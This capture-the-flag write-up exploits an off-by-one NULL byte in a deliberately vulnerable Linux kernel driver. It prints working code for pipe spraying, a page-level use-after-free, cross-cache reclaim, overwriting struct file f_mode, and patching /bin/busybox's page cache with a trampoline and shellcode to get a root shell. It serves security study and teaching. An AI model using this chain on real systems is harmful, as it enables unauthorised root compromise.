TL;DR
A single-byte NULL off-by-one in a kmalloc-1024 object is leveraged into a pipe_buffer.page LSB clear → page-level UAF → cross-cache reclaim into filp_cachep → struct file->f_mode overwrite → page-cache code injection into /bin/busybox (Dirty-Pipe style) → root code execution. Fully leakless: no kernel address is ever read.
Description: Make a contract and become a magical girl!
Target: Linux 6.17.7, x86-64. Mitigations on: SMEP, SMAP, KPTI (pti=on), KASLR, dmesg_restrict=1, kptr_restrict=1. The interactive shell runs as uid 1000.
Challenge setup
The distribution ships bzImage, vmlinux, initramfs.cpio and run.sh. QEMU boots with the usual hardening:
qemu-system-x86_64 \
-kernel bzImage -initrd initramfs.cpio \
-cpu qemu64,+smap,+smep -smp 1 -m 256M \
-append "console=ttyS0 quiet loglevel=3 oops=panic panic_on_warn=1 panic=-1 pti=on" \
-no-reboot -nographic -monitor /dev/null -enable-kvm
The init script defines the threat model:
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict # no dmesg -> any %px leak is useless
chmod 600 flag.txt # /flag.txt readable by root only
insmod /driver/qb.ko
setsid cttyhack setuidgid 1000 /bin/sh # our shell is UNPRIVILEGED (uid 1000)
poweroff -d 1 -n -f # <-- runs as ROOT when our shell exits
Two facts shape the whole exploit:
- We are uid 1000; the flag is root-only, so we need root code execution.
- When our shell exits, init (PID 1, root) runs poweroff -f. That is our eventual root trigger.
The module
qb.ko is not stripped. It registers the misc device /dev/QB with a single unlocked_ioctl handler and three globals:
char *puregem; // a single kmalloc-1024 object, zero-initialised, alloc-once, never freed
int griefseed_num; // a counter, written by CHECK, read nowhere
struct mutex LOCK;
The file_operations only wires .unlocked_ioctl = qb_ioctl. There is no open, release, read, write, mmap, and crucially no kfree and no copy_to_user anywhere in the module.
#define QB_ALLOC 0x16C0 // "sign the contract"
#define QB_CLEAR 0x16C1 // "purify the soul gem" <-- the bug lives here
#define QB_CHECK 0x16C2 // "attack the witch"
long qb_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
    mutex_lock(&LOCK);
    if (cmd == QB_ALLOC) {                              // 0x16C0
        struct contract { char name[16]; char wish[48]; } req;   // 0x40 bytes
        if (copy_from_user(&req, arg, sizeof(req)) == 0 && !puregem) {
            // kmalloc_caches[NORMAL][10] == kmalloc-1024, GFP_KERNEL|__GFP_ZERO
            puregem = __kmalloc_cache_noprof(kmalloc_caches[10], 0xdc0, 0x400);
            printk("[QB] Name: %.16s, Wish: %.30s\n", req.name, req.wish);
            printk("[QB] puregem pointer: %px\n", puregem);   // leak, but dmesg_restrict kills it
            // NOTE: req is never stored into puregem, only logged.
        }
    }
    else if (cmd == QB_CLEAR) {                         // 0x16C1
        unsigned int size;
        if (copy_from_user(&size, arg, 4) == 0 && puregem && size <= 0x400) {
            memset(puregem, 0, size + 1);               // size==0x400 -> writes 0x401 bytes
        }
    }
    else if (cmd == QB_CHECK) {                         // 0x16C2
        int v[5];
        if (copy_from_user(v, arg, 0x14) == 0 && puregem) {
            int sum = v[0]*0xDE + v[1]*0x67 + v[2]*0x25D + v[3]*0x398 + v[4]*0x1FD;
            if (sum != 0x259B) BUG();                   // gate, no heap effect
            griefseed_num++;
        }
    }
    mutex_unlock(&LOCK);
    return ...;
}
| ioctl | role |
|---|---|
| QB_ALLOC | creates the single kmalloc-1024 object puregem (once). User data is not stored, only printed. The %px leak is dead (dmesg_restrict). |
| QB_CLEAR | the bug. memset(puregem, 0, size+1). |
| QB_CHECK | a gate that must be passed (it BUG()s otherwise) but has no heap effect. |
The QB_CHECK gate requires 0xDE*v0 + 0x67*v1 + 0x25D*v2 + 0x398*v3 + 0x1FD*v4 == 0x259B. Any solution works, e.g. {5, 7, 8, 1, 4} (5·222 + 7·103 + 8·605 + 1·920 + 4·509 = 9627 = 0x259B). It must be passed before the overflow so we don’t trip the BUG().
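The gate arithmetic is easy to check offline before sending anything to the driver. The following is a minimal user-space sketch: the coefficients and target are the ones quoted above, while the helper names qb_gate_sum and qb_gate_ok are made up for illustration and do not exist in the module.

```c
/* Coefficients and target as quoted from the decompiled QB_CHECK handler. */
static const int QB_COEFF[5] = { 0xDE, 0x67, 0x25D, 0x398, 0x1FD };
#define QB_TARGET 0x259B

/* Hypothetical helper: the weighted sum the driver compares to QB_TARGET. */
static int qb_gate_sum(const int v[5])
{
    int sum = 0;
    for (int i = 0; i < 5; i++)
        sum += v[i] * QB_COEFF[i];
    return sum;
}

/* Hypothetical helper: 1 if the vector passes the gate, 0 if it would BUG(). */
static int qb_gate_ok(const int v[5])
{
    return qb_gate_sum(v) == QB_TARGET;
}
```

Calling qb_gate_ok on a candidate vector before issuing the ioctl avoids tripping BUG() (and, with oops=panic, losing the VM) on a typo.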
Vulnerability
QB_CLEAR validates the length with > instead of >=:
if (size > 0x400) { /* reject */ } // accepts size == 0x400
...
memset(puregem, 0, size + 1); // size==0x400 -> memset of 0x401 bytes
puregem is a kmalloc(0x400) buffer (1024 bytes, indices 0x000..0x3FF). With size == 0x400, memset writes 0x401 bytes, so the last zero byte goes to index 0x400, one byte past the end of the buffer.
Because puregem is allocated __GFP_ZERO and never written, the entire memset is a no-op except for that one byte hitting the first byte of the adjacent kmalloc-1024 object. This is a deterministic, replayable, single NULL-byte overflow.
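The off-by-one can be reproduced in user space to see exactly which byte is touched. This is only a model, assuming two kmalloc-1024 objects sit back to back in one array; qb_clear_model is a hypothetical name that mirrors the driver's check and memset, not the driver's code.

```c
#include <stddef.h>
#include <string.h>

#define OBJ_SIZE 0x400   /* size of one kmalloc-1024 object */

/*
 * User-space model: `slab` stands in for puregem followed by its neighbour.
 * Applies the same bounds check and memset as QB_CLEAR and returns how many
 * bytes of the neighbour were zeroed.
 */
static size_t qb_clear_model(unsigned char slab[2 * OBJ_SIZE], unsigned int size)
{
    if (size > OBJ_SIZE)                 /* the driver's too-weak check */
        return 0;
    memset(slab, 0, (size_t)size + 1);   /* size + 1 bytes, as in the module */
    return (size + 1 > OBJ_SIZE) ? (size + 1 - OBJ_SIZE) : 0;
}
```

With size == 0x3FF the neighbour is untouched; with size == 0x400 exactly one byte of it, the first, becomes zero.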
Object collision in kmalloc-1024
A pipe keeps a ring of pipe_buffer descriptors (default PIPE_DEF_BUFFERS = 16), allocated as one array:
struct pipe_buffer {
struct page *page; /* +0x00 <-- our NULL byte hits its LSB */
unsigned int offset, len; /* +0x08, +0x0C */
const struct pipe_buf_operations *ops; /* +0x10 */
unsigned int flags; /* +0x18 */
unsigned long private; /* +0x20 */
}; /* 40 bytes */
16 * 40 = 640 bytes → lands in kmalloc-1024, the same cache as puregem. By grooming the slab so puregem’s neighbour is a pipe_buffer array, the NULL byte clears the LSB of pipe_buffer[0].page.
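The size-class claim can be sanity-checked with a rough rounding model. This sketch assumes power-of-two classes only; real kernels also have kmalloc-96 and kmalloc-192, which are ignored here, and kmalloc_class is an illustrative name rather than a kernel function.

```c
#include <stddef.h>

#define PIPE_DEF_BUFFERS 16   /* default ring size, from the text */
#define PIPE_BUFFER_SIZE 40   /* sizeof(struct pipe_buffer), from the text */

/*
 * Simplified size-class lookup: round up to the next power of two,
 * starting at 8. Deliberately ignores the 96- and 192-byte caches.
 */
static size_t kmalloc_class(size_t n)
{
    size_t c = 8;
    while (c < n)
        c <<= 1;
    return c;
}
```

Both kmalloc_class(PIPE_DEF_BUFFERS * PIPE_BUFFER_SIZE) and kmalloc_class(0x400) come out as 1024 under this model, which is why the pipe ring and puregem can share a slab.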
Page-pointer LSB clear (PageJack-style)
The kernel keeps a struct page descriptor for every physical page in the flat vmemmap array. Since sizeof(struct page) == 0x40, every valid struct page * is 0x40-aligned, so its low byte is one of 0x00, 0x40, 0x80 or 0xC0. Clearing that byte moves the pointer back by 0-3 entries: it now describes a nearby physical page 0-3 PFNs lower (0 means the low byte was already 0x00 and nothing changed). With a dense pipe spray, that neighbouring page reliably belongs to another pipe.
The bytes you write() into a pipe live in page (a separate 4 KiB page), so the redirected pipe_buffer now reads/writes another pipe’s data page. No PTE is involved: the corruption is purely in the kernel pointer dereferenced for pipe I/O.
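The pointer arithmetic behind the LSB clear can be written out directly. This is a small sketch under the stated assumption that sizeof(struct page) is 0x40; the helper names are made up, and any address fed to them is only an example value, since the exploit never learns a real one.

```c
#include <stdint.h>

#define STRUCT_PAGE_SIZE 0x40u   /* sizeof(struct page), from the text */

/* What the single NULL byte does to a little-endian struct page pointer. */
static uint64_t clear_lsb(uint64_t page_ptr)
{
    return page_ptr & ~0xFFull;
}

/* How many vmemmap entries (i.e. PFNs) the pointer moved back: 0..3. */
static unsigned pfn_shift(uint64_t page_ptr)
{
    return (unsigned)((page_ptr - clear_lsb(page_ptr)) / STRUCT_PAGE_SIZE);
}
```

For a pointer whose low byte is 0x80, pfn_shift returns 2, meaning the pipe now targets the page two frames below its own.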
Pipe append semantics and the marker design
A pipe_buffer tracks offset (read position) and len (unread bytes). The next write() appends at page + offset + len; a read() that leaves len > 0 advances offset but does not call pipe_buf_release/put_page. This drives the whole detection-and-corruption dance.
Each pipe is tagged with 2 + 2 bytes:
uint16_t mark = MARK_BASE + i;
write(pipes[i][1], &mark, sizeof(mark)); // 2 bytes: unique marker
write(pipes[i][1], "23", 2); // 2 bytes: padding
- The 2-byte marker identifies the pipe’s data page (leakless detection below).
- The 2-byte padding keeps the buffer non-empty after detection reads 2 bytes, and positions the write cursor at offset 4 for the later f_mode overwrite.
After tagging, each buffer sits at offset=0, len=4. The detection scan reads 2 bytes, leaving offset=2, len=2 → still offset + len == 4, page not released. The final corruption write then lands at page offset 4.
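The cursor bookkeeping is easier to follow as a tiny state machine. The model below is a deliberate simplification: it tracks a single pipe_buffer, ignores page boundaries and merge flags, and uses hypothetical names (pipe_buf_model, model_write, model_read) that are not kernel symbols.

```c
/* Minimal model of one pipe_buffer's read/write cursor. */
struct pipe_buf_model {
    unsigned int offset;    /* read position inside the page */
    unsigned int len;       /* unread bytes */
    int released;           /* set once the buffer drains (page dropped) */
};

/* Append n bytes; returns the page offset where they land. */
static unsigned int model_write(struct pipe_buf_model *b, unsigned int n)
{
    unsigned int at = b->offset + b->len;
    b->len += n;
    return at;
}

/* Consume up to n bytes; a fully drained buffer releases its page. */
static void model_read(struct pipe_buf_model *b, unsigned int n)
{
    if (n > b->len)
        n = b->len;
    b->offset += n;
    b->len -= n;
    if (b->len == 0)
        b->released = 1;
}
```

Running the marker sequence (write 2, write 2, read 2) through the model leaves offset=2, len=2 with the page still attached, and the next write lands at offset 4. Dropping the padding write drains the buffer on the first read instead.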
Cross-cache: filp_cachep and the buddy allocator
struct file lives in its own dedicated cache, filp_cachep. Slab caches are isolated at the slab layer, but they all pull backing pages from the same buddy allocator. A pipe data page is not a slab object at all: it comes straight from the page allocator, so once it is freed it can be reissued to filp_cachep on that cache’s next refill. That is how we reach a struct file without any in-module free primitive.
struct file {
spinlock_t f_lock; /* +0x00 (4 bytes) */
fmode_t f_mode; /* +0x04 <-- target */
const struct file_operations *f_op; /* +0x08 */
/* ... */
};
f_mode sits at offset 4 (confirmed with pahole -C file vmlinux, and empirically: a write at page-offset 4 flips writability). vfs_write() returns -EBADF unless f_mode & FMODE_WRITE. We overwrite f_mode with 0x084f801f (FMODE_WRITE | FMODE_PWRITE | FMODE_LSEEK | FMODE_OPENED | FMODE_CAN_*), turning an O_RDONLY busybox handle into a writable one.
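To make the bit test concrete, here is a hedged sketch of the two checks that matter for the later pwrite. Only the five low FMODE_* bits are spelled out, with the values from include/linux/fs.h; the higher bits of 0x084f801f are left undecoded, and the helper names are illustrative.

```c
#include <stdint.h>

/* Low FMODE_* bits as defined in include/linux/fs.h. */
#define FMODE_READ   0x01u
#define FMODE_WRITE  0x02u
#define FMODE_LSEEK  0x04u
#define FMODE_PREAD  0x08u
#define FMODE_PWRITE 0x10u

#define FAKE_FMODE 0x084f801fu   /* value written by the exploit */

/* Mirrors the FMODE_WRITE test that gates vfs_write(). */
static int mode_allows_write(uint32_t f_mode)
{
    return (f_mode & FMODE_WRITE) != 0;
}

/* pwrite() additionally needs FMODE_PWRITE. */
static int mode_allows_pwrite(uint32_t f_mode)
{
    return mode_allows_write(f_mode) && (f_mode & FMODE_PWRITE) != 0;
}
```

FAKE_FMODE passes both checks; the same value with FMODE_WRITE masked out fails, which is the only difference the kernel sees between a read-only and a writable handle here.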
Busybox recon: cave, reboot wrapper, trampoline, shellcode
busybox is non-PIE (ET_EXEC, base 0x400000), so file_offset = vaddr − 0x400000.
init runs poweroff -f, which calls the reboot() syscall. We locate busybox’s reboot wrapper by its magics:
$ objdump -d -M intel busybox | grep 0xfee1dead
48bf90: f3 0f 1e fa endbr64 <-- function entry (OFF_TRAMP)
48bf94: 89 fa mov edx,edi ; cmd
48bf96: be 69 19 12 28 mov esi,0x28121969 ; MAGIC2
48bf9b: bf ad de e1 fe mov edi,0xfee1dead ; MAGIC1
48bfa0: b8 a9 00 00 00 mov eax,0xa9 ; __NR_reboot (169)
48bfa5: 0f 05 syscall
The reboot entry 0x48bf90 has 11 bytes before the next instruction, enough for a 10-byte trampoline. There is no 64-byte run of padding in this dense binary, so we sacrifice a function: scanning endbr64 entries with enough room yields 0x5df693 (0xAA bytes) as a code cave.
Trampoline (overwrites the reboot entry, jumps into the cave):
mov r8, 0x5df693
jmp r8
→ 49 c7 c0 93 f6 5d 00 41 ff e0 (10 bytes).
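The 10 trampoline bytes can also be generated rather than hand-assembled, which helps if the cave address changes. This sketch assumes the target fits in a positive 32-bit immediate (the mov r8, imm32 form sign-extends); build_trampoline is a hypothetical helper name.

```c
#include <stdint.h>

#define TRAMP_LEN 10

/*
 * Emit `mov r8, imm32 ; jmp r8` for a low (non-PIE) target address.
 * Returns 0 on success, -1 if the address would be sign-extended wrongly.
 */
static int build_trampoline(uint32_t target, uint8_t out[TRAMP_LEN])
{
    if (target > 0x7fffffffu)
        return -1;
    out[0] = 0x49; out[1] = 0xc7; out[2] = 0xc0;   /* mov r8, imm32 */
    out[3] = (uint8_t)(target & 0xff);             /* imm32, little-endian */
    out[4] = (uint8_t)((target >> 8) & 0xff);
    out[5] = (uint8_t)((target >> 16) & 0xff);
    out[6] = (uint8_t)((target >> 24) & 0xff);
    out[7] = 0x41; out[8] = 0xff; out[9] = 0xe0;   /* jmp r8 */
    return 0;
}
```

For target 0x5df693 this reproduces the byte string shown above.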
Shellcode, self-contained execve("/bin/sh"), built on the stack (the root poweroff process has a valid stack), 48 bytes, fits the 0xAA cave:
from pwn import *
context.arch = 'amd64'
sc = asm(shellcraft.amd64.linux.sh())
Exploitation
Step 1: sandwich puregem between pipe rings
puregem is allocated between two halves of the pipe spray, so its neighbour is reliably a pipe_buffer array rather than a slab edge:
spray_pipes(0, N_PIPE_HALF); // 0x40 pipes
qb_alloc(fd, name, wish); // puregem in the middle
spray_pipes(N_PIPE_HALF, N_PIPE); // 0x40 more
qb_check(fd); // pass the gate first
qb_clear(fd, 0x400); // FIRE: NULL byte on pipe_buffer[0].page
Step 2: leakless alias detection
Exactly one pipe’s page now points to another pipe’s page. We read each marker back; the corrupted pipe returns somebody else’s marker:
int detect_alias(int *overlap, int *origin) {
    for (int i = 0; i < N_PIPE; i++) {
        unsigned short val = 0;
        if (read(pipes[i][0], &val, sizeof(val)) != sizeof(val)) continue;
        if (val == (unsigned short)(MARK_BASE + i)) continue;   // healthy
        int cand = (int)val - MARK_BASE;                        // whose page?
        if (cand >= 0 && cand < N_PIPE && cand != i) {
            *overlap = i; *origin = cand;
            return 1;
        }
    }
    return 0;
}
The cand validation discards the case where the byte landed on an unrelated page. No kernel address is ever read. This is what makes the exploit leakless. Each read consumes 2 of 4 bytes, so neither page is released; overlap and origin both reference the shared page.
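The per-pipe decision can be pulled out into a pure function, which makes the three outcomes (healthy, aliased, unrelated page) explicit and testable without a kernel. This is a sketch, not the exploit's code: classify_marker and its return convention are invented for illustration, and the marker base is passed in as a parameter because the write-up does not state MARK_BASE's value.

```c
#include <stdint.h>

#define MARKER_HEALTHY   (-1)   /* pipe read back its own marker */
#define MARKER_UNRELATED (-2)   /* value does not map to any sprayed pipe */

/*
 * Classify the 2-byte value read from pipe i.
 * Returns the index of the pipe whose page we are aliasing, or one of
 * the negative codes above.
 */
static int classify_marker(int i, uint16_t val, int n_pipe, uint16_t mark_base)
{
    if (val == (uint16_t)(mark_base + i))
        return MARKER_HEALTHY;
    int cand = (int)val - (int)mark_base;
    if (cand >= 0 && cand < n_pipe && cand != i)
        return cand;
    return MARKER_UNRELATED;
}
```

A non-negative result plays the role of origin in detect_alias, with i as overlap.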
Step 3: free the shared page (page UAF)
close(pipes[origin][0]);
close(pipes[origin][1]); // pipe_release -> put_page; page returns to buddy
The overlap pipe still holds a stale .page pointing at the freed page: page-level use-after-free.
Step 4: cross-cache reclaim into filp
void spray_files(void) {
for (int i = 0; i < N_FILE; i++) // N_FILE = 0x50
file_fds[i] = open("/bin/busybox", O_RDONLY);
}
filp_cachep grabs fresh slab pages; one reuses the freed page and fills it with struct files. The struct file at page offset 0 has its f_mode at page offset 4.
Step 5: overwrite f_mode through the dangling pipe
void corrupt_fmode(int overlap) {
uint32_t fmode = FAKE_FMODE; // 0x084f801f
write(pipes[overlap][1], &fmode, sizeof(fmode)); // appends at page offset 4 = f_mode
}
Had we written only the 2-byte marker, reading 2 bytes would drain the buffer (len == 0), pipe_buf_release() would drop the corrupted page, and the next write would go to a fresh page. The 2-byte padding keeps the page attached and aligns this write onto f_mode.
Step 6: find the writable handle
Only the struct file at page offset 0 was corrupted. We probe each fd non-destructively (read a byte, write it back); only the corrupted one accepts the write:
int find_writable(void) {
    for (int i = 0; i < N_FILE; i++) {
        unsigned char b;
        if (pread(file_fds[i], &b, 1, 0) != 1)      // never write back an uninitialised byte
            continue;
        if (pwrite(file_fds[i], &b, 1, 0) == 1)     // FMODE_WRITE set -> writable
            return file_fds[i];
    }
    return -1;
}
Step 7: page-cache code injection (Dirty-Pipe style)
Writing through the corrupted (now writable) struct file modifies /bin/busybox’s page cache. Busybox text is mapped from that same page cache (shared, no COW for text), so the patch is seen by any process that execs busybox:
#define OFF_SHELL (0x5df693 - 0x400000) // cave -> shellcode
#define OFF_TRAMP (0x48bf90 - 0x400000) // reboot entry -> trampoline
patch_busybox(fd_corrupt, OFF_SHELL, shellcode, sizeof(shellcode) - 1);
patch_busybox(fd_corrupt, OFF_TRAMP, trampoline, sizeof(trampoline) - 1);
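The write-up does not show patch_busybox itself. One plausible shape, assuming it is just a positional write with the same (fd, offset, buffer, length) arguments as the calls above, is a pwrite loop that tolerates short writes; treat this as a guess at the helper, not the author's implementation.

```c
#include <errno.h>
#include <stddef.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Assumed implementation: write len bytes of buf at file offset off,
 * retrying on EINTR and continuing after short writes.
 * Returns 0 on success, -1 on error.
 */
static int patch_busybox(int fd, off_t off, const void *buf, size_t len)
{
    const unsigned char *p = buf;
    while (len > 0) {
        ssize_t n = pwrite(fd, p, len, off);
        if (n < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        if (n == 0)
            return -1;          /* no progress; give up */
        p += n;
        off += n;
        len -= (size_t)n;
    }
    return 0;
}
```

Using pwrite keeps the file position untouched, so the two patches can be applied in either order.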
Step 8: trigger root
The exploit only patches and returns. We then type exit:
exit -> init (root) runs `poweroff -d 1 -n -f`
-> executes patched busybox
-> reboot() entry is now our trampoline
-> jmp 0x5df693 -> execve("/bin/sh") -> ROOT shell on the console
reboot() never runs (we jumped away), so the box doesn’t power off; we get an interactive root shell instead.
Notes & lessons
What was already familiar. PageJack (page-level UAF by clearing the LSB of pipe_buffer.page) and Dirty Pipe (writing into a file’s page cache to patch a shared executable) were techniques I already knew going in. They are the bookends of this chain, not the part I learned.
What I actually learned: corrupting struct file. The novel piece for me was the bridge between those two techniques: turning a page-level UAF into an arbitrary page-cache write by hijacking a struct file. The specific lessons:
- f_mode is a privilege bit you can flip. A struct file opened O_RDONLY only lacks FMODE_WRITE; the underlying inode and page cache are otherwise fully reachable. Overwriting f_mode (offset 4) with 0x084f801f (FMODE_WRITE | FMODE_PWRITE | ...) is enough to make vfs_write/pwrite accept the handle. No f_op hijack, no ROP: a single 4-byte write converts a read-only fd into a writable one.
- struct file is a great cross-cache landing target. Spraying open("/bin/busybox") fills filp_cachep with predictable struct files; the one at page offset 0 puts f_mode exactly at the offset our dangling pipe writes to. The reclaim is reliable and needs no leak to confirm: I just probe each fd with a non-destructive read/write-back and watch which one becomes writable.
- A writable handle on a shared binary == Dirty Pipe. Once the O_RDONLY busybox fd is writable, pwrite lands straight in busybox’s page cache, which is shared (no COW for text) with every process that execs it. That is what let me rewrite /bin/busybox and get root’s poweroff to run my shellcode. The corruption of struct file is the thing that made the Dirty-Pipe-style finish possible here.
References
- PageJack, Black Hat USA 2024 by Qian: https://i.blackhat.com/BH-US-24/Presentations/US24-Qian-PageJack-A-Powerful-Exploit-Technique-With-Page-Level-UAF-Thursday.pdf
- Dirty Pipe (CVE-2022-0847), Max Kellermann: https://dirtypipe.cm4all.com/
- Reviving exploits against cred_struct (cross-cache groundwork), willsroot: https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html